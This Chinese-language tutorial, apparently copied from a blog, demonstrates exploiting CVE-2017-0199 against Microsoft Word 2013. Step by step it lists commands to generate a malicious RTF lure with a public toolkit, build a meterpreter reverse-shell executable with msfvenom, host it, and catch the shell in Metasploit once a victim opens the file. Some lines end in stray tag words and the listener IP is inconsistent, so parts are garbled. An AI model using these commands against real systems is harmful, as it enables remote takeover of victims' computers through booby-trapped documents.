Microsoft Word下的惡意RTF文件容易被收到攻擊,在本文中,咱們使用python腳本對Microsoft Word 2013進行oday攻擊演示,該腳本會生成惡意的.rtf文件,並提供目標系統的篡改會話。
利用工具包CVE-2017-0199 - v2.0是一個頗有用的python利用腳本,它提供了一種快速有效的利用Microsoft RTF RCE進行攻擊的方式。它能夠生成惡意的RTF文件,並將metasploit 下meterpreter反彈shell有效載荷提供給攻擊者,而不須要任何複雜的配置。
測試環境:
攻擊者:Kali Linux(ip:192.168.1.24)
目標:Windows 10( Microsoft Word 2013 )
1.打開您的kali Linux的shell終端,而後輸入如下命令生成一個惡意rtf:html
git clone https://github.com/bhdresh/CVE-2017-0199.git
此命令將運行一個python腳原本生成富文本格式的有效載荷,其中-M用於生成rtf文件,-w用於生成rtf文件的名稱,即sales.rtf, -u爲攻擊者的IP地址或域名。python
cd CVE-2017-0199
python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u http://192.168.1.24/raj.doc
如下截圖中的命令輸出生成的惡意.rtf文件即sales.rtf文件能夠在系統中找到。在咱們將這個文件發送給被攻擊者以前,咱們須要將它嵌套到任何後門文件中,以便咱們能夠創建與被攻擊者的反向鏈接。git
2.在新終端shell上,使用msfvenom來生成一個exe的有效載荷,以便進行攻擊。其命令以下:github
Msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.1.24 lport = 4444 -f exe> /root/Desktop/raj.exe
3.如今將raj.exe和sales.rtf移動到/var/www/html中
shell
4.如今鍵入如下命令,將raj.exe與sales.rtf進行合併。而後,啓動多個處理程序以反向連被入侵者。其命令以下:
python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.24/raj.exe -l /var/www/html/raj.exewindows
5.當受害者打開sales.rtf文件時,攻擊者將會在metasploite框架內收到反彈shell框架
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
或者tcp
msf> use multi/handler
msf exploit(handler )> set payload windows / meterpreter / reverse_tcp
msf exploit(handler )> set lhost 192.168.1.24
msf exploit(handler )> set lport 4444
msf exploit(handler )> exploit
syspreter> sysinfo